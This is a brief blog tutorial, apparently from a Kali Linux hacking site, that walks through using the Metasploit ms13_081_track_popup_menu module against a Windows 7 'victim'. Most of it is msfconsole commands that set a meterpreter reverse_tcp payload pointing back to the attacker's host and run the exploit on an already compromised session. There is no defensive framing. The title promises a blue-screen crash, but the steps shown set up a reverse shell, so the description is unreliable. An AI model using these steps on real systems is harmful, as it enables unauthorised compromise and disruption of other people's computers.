Categories

Archives

Kali Linux, Penetration Testing

How to Perform Blue Screen Death Attack on Remote Windows 7 PC

This Metasploit module exploits vulnerability in win32k.sys where under specific conditions TrackPopupMenuEx will pass a NULL pointer to the MNEndMenuState procedure. This Metasploit module has been tested successfully on Windows 7 SP0 and Windows 7 SP1

Exploit Targets

Windows 7

Requirement

Attacker: Kali Linux

Victim PC: Windows 7

First Hack the Victim PC Using Metaspolit (Tutorial How to Hack Remote PC)

Now Open Kali terminal type msfconsole

Now type use exploit/windows/local/ms13_081_track_popup_menu

msf exploit (ms13_081_track_popup_menu)>set payload windows/meterpreter/reverse_tcp

msf exploit (ms13_081_track_popup_menu)>set lhost 192.168.1.6 (IP of Local Host)

msf exploit (ms13_081_track_popup_menu)>set session 1

msf exploit (ms13_081_track_popup_menu)>exploit

2 thoughts on “How to Perform Blue Screen Death Attack on Remote Windows 7 PC

Comments are closed.